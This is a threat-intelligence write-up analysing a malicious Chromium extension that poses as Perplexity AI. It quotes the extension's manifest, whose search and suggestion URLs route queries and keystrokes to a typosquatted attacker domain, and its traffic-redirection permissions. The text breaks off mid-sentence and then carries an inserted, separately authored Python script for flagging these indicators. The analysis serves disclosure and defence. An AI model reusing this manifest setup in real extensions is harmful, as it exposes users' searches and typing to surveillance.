Malware | Jun 29, 2026

Chromium extension uses AI‑related branding to redirect browser search

Malicious Chromium extension spoofs Perplexity AI to hijack browser search traffic.

Summary

A malicious Chromium-based browser extension, masquerading as the AI search engine Perplexity AI, has been identified. It uses Manifest V3 APIs and intermediary infrastructure to redirect user search queries and collect data. Microsoft reported the extension to Google, leading to its removal.

Full text

Microsoft Threat Intelligence has identified a malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI to trick unsuspecting users into installing it. Based on our observation of the extension’s behavior, we assess its primary objective to be search traffic interception and data collection, which might enable downstream use cases such as profiling, targeted advertising, or other forms of misuse depending on operator intent. Through responsible disclosure, we reported this extension to Google, and it has been taken down as of this writing. We’d like to thank Google for responding to and addressing this issue.

Browser extensions continue to represent a significant attack surface within enterprise and consumer ecosystems due to their privileged access to browser APIs, user traffic, and browsing behavior. However, unlike traditional search hijackers that rely primarily on aggressive monetization or visible redirection, this extension combines Manifest Version 3 (MV3) capabilities with intermediary infrastructure and declarativeNetRequest (DNR) rules to transparently intercept Omnibox queries while preserving the appearance of legitimate search results. In addition, while browser search hijacking is not a new threat category, this research highlights how threat actors continue to operationalize AI to accelerate attacks—specifically the use of AI brands as a social engineering vector. The extension routes both full search queries and real-time search suggestions (typed characters) through attacker-controlled infrastructure hosted on a domain not associated with the legitimate vendor, before redirecting users to expected search providers.
While the observed activity demonstrates the capability to capture user input and browsing signals, no evidence in our analysis definitively confirms additional objectives such as credential theft. However, the level of access and permissions requested introduces elevated privacy and security risk. As threat actors continue to capitalize on emerging industry trends such as AI and leverage trusted branding to improve the success rates of their campaigns, organizations should strengthen user awareness training and similar programs to educate end users about the latest social engineering tactics. They should also implement a layered security strategy that correlates available indicators with behavioral signals and other threat intelligence.

In this blog post, we provide our analysis of the browser extension—including key indicators of malicious behavior and findings from our dynamic analysis. We also provide mitigation and protection guidance, as well as advanced hunting queries, to help organizations detect and defend against this threat.

Extension overview

The extension we analyzed has the following attributes:

    Attribute           Value
    Extension name      Search for perplexity ai
    Extension ID        flkebkiofojicogddingbdmcmkpbplcd
    Manifest version    MV3
    Version             2.2
    Observed purpose    Browser search override and redirect logic
    Referenced brand    Perplexity AI
    Suspicious domain   perplexity-ai[.]online

It appears to spoof the publicly available Perplexity service by using similar branding elements and a typosquatted domain. This domain mismatch might increase the likelihood of user confusion regarding the extension’s source or affiliation.

Figure 1: Landing page of perplexity-ai[.]online.

Figure 2: Details of the extension on Chrome Store.

Based on our analysis, the extension has been classified as malicious due to observed search redirection behavior.
The analyzed extension’s manifest declares itself as the following:

    "search_provider": {
        "name": "Perplexity Search"
    }

It uses the following infrastructure:

    "search_url": "https://perplexity-ai[.]online/search/{searchTerms}"

The extension also forces itself as the browser default search provider:

    "is_default": true

At first glance, the extension appears to provide AI-enhanced search functionality. However, analysis of the manifest reveals multiple suspicious behaviors and permissions inconsistent with legitimate AI search assistants.

Figure 3. Manifest.json configuration of the analyzed extension.

Figure 4. Manifest.json configuration of the analyzed extension (continued).

Key indicators of malicious behavior

Typosquatted infrastructure

The extension uses the domain perplexity-ai[.]online, which is similar to the legitimate Perplexity AI service’s domain (perplexity[.]ai). This pattern is consistent with domain naming approaches frequently observed in phishing campaigns, search hijackers, fake AI applications, and extension malware.
Previous research has discussed how browser extensions might use branding similar to trusted services because:

  • Users associate AI tools with productivity and legitimacy
  • AI-related extensions currently experience high install rates
  • Users are less suspicious of browser-integrated AI assistants

Browser search hijacking

The extension overrides browser search settings through chrome_settings_overrides to replace the browser default search provider as well as intercept and redirect all queries in a Chromium browser’s Omnibox to an intermediary infrastructure not associated with the official vendor domain:

    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Perplexity Search",
            "keyword": "perplexity",
            "is_default": true,
            "search_url": "hxxps://perplexity-ai[.]online/search/{searchTerms}",
            "favicon_url": "hxxps://perplexity-ai[.]online/favicon.ico",
            "suggest_url": "hxxps://perplexity-ai[.]online/search?output=firefox&q={searchTerms}"
        }
    }

Critically, the suggest_url field also routes through perplexity-ai[.]online. This means real-time search suggestions—every character typed in the address bar—are transmitted to an attacker-controlled infrastructure before any redirect occurs. This constitutes active user surveillance (keystroke-level capture) beyond simple search redirection. Although Chromium-based browsers permit search provider overrides for legitimate use cases, Google explicitly states that extensions requesting settings overrides along with additional powerful capabilities might violate the browser’s single-purpose policy.
Abuse of declarativeNetRequest

The extension requests powerful DNR permissions that enable traffic redirection, URL rewriting, and selective request filtering, which aren’t consistent with expected AI assistant behavior:

    "permissions": [
        "declarativeNetRequest",
        "declarativeNetRequestFeedback",
        "declarativeNetRequestWithHostAccess"
    ]

These permissions provide specific capabilities exploited by this extension:

  • declarativeNetRequest: Redirects all main_frame requests matching perplexity-ai[.]online/search/(.*) to legitimate search engines, creating a two-hop chain where the attacker server processes the query before the browser is redirected.
  • declarativeNetRequestFeedback: Allows the extension to programmatically monitor which redirect rules fire, effectively confirming exfiltration success for each intercepted query.
  • declarativeNetRequestWithHostAccess: Combined with host_permissions for ://perplexity-ai.online/, enables full request interception capabilities on the attacker-controlled domain.

This behavior might enable traffic redirection and related activity depending on implementation. The use of these permissions in an AI-themed search extension is particularly concerning because a legitimate search UI generally doesn’t require advanced network-manipulation APIs.

Search rewrite infrastructure

Multiple rule sets indicate modular traffic hijacking capability across providers such as Perplexity, Google, and Bing:

    "rule_resources": [
        { "id": "perplexity", "enabled": true, "path": "perplexity-rules.json" },
        { "id": "bing", "enabled": false, "path": "bing-rules.json" },
        { "id": "google", "enabled": false, "path": "google-rules.json" }
    ]

This architecture enables modular traffic redirection
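As an added example (not Microsoft's tooling and not code from the extension), a small Python triage script that reads an MV3 manifest and flags the indicators discussed above: search and suggest URLs pointing to a host other than the brand's own, a forced default provider, DNR permissions, and disabled rule sets that could be switched on later. The sample manifest is constructed from the fields quoted in the write-up; the allowlist of expected hosts is an assumption.

```python
"""Static triage of a Chromium MV3 manifest for the search-hijack indicators
described above (added example, not Microsoft's own tooling)."""
import json
from urllib.parse import urlparse

DNR_PERMISSIONS = {"declarativeNetRequest", "declarativeNetRequestFeedback",
                   "declarativeNetRequestWithHostAccess"}

def refang(text: str) -> str:
    """Undo report-style defanging (hxxps, [.]) so the URL can be parsed."""
    return text.replace("hxxp", "http").replace("[.]", ".")

def triage_manifest(manifest: dict, expected_hosts: set[str]) -> list[str]:
    """Return findings as strings; an empty list means nothing was flagged.
    expected_hosts: hosts the extension's branding would legitimately use (assumed)."""
    findings = []
    provider = manifest.get("chrome_settings_overrides", {}).get("search_provider", {})
    for key in ("search_url", "suggest_url"):  # suggest_url leaks every keystroke
        url = provider.get(key)
        if url:
            host = urlparse(refang(url)).hostname or ""
            if host not in expected_hosts:
                findings.append(f"{key} routes to off-brand host {host}")
    if provider.get("is_default"):
        findings.append("search_provider forces itself as default (is_default=true)")
    dnr = DNR_PERMISSIONS & set(manifest.get("permissions", []))
    if dnr:
        findings.append("DNR permissions requested: " + ", ".join(sorted(dnr)))
    rule_sets = manifest.get("declarative_net_request", {}).get("rule_resources", [])
    dormant = [r["id"] for r in rule_sets if not r.get("enabled", True)]
    if dormant:  # disabled rule sets can be enabled at runtime without a store review
        findings.append("dormant rule sets present: " + ", ".join(dormant))
    return findings

# Constructed sample manifest reproducing the fields quoted in the write-up.
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Search for perplexity ai",
  "permissions": ["declarativeNetRequest", "declarativeNetRequestFeedback",
                  "declarativeNetRequestWithHostAccess"],
  "chrome_settings_overrides": {"search_provider": {
    "name": "Perplexity Search", "keyword": "perplexity", "is_default": true,
    "search_url": "hxxps://perplexity-ai[.]online/search/{searchTerms}",
    "suggest_url": "hxxps://perplexity-ai[.]online/search?output=firefox&q={searchTerms}"}},
  "declarative_net_request": {"rule_resources": [
    {"id": "perplexity", "enabled": true, "path": "perplexity-rules.json"},
    {"id": "bing", "enabled": false, "path": "bing-rules.json"},
    {"id": "google", "enabled": false, "path": "google-rules.json"}]}
}""")
```

Running `triage_manifest(SAMPLE_MANIFEST, {"perplexity.ai", "www.perplexity.ai"})` returns five findings for the sample; the same function can be pointed at any unpacked extension's manifest.json.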

Indicators of Compromise

  • domain — perplexity-ai[.]online
  • url — https://perplexity-ai[.]online/search/{searchTerms}

Entities

  • Chromium (product)
  • Perplexity AI (product)
  • Microsoft (vendor)
  • Google (vendor)
  • Manifest V3 (technology)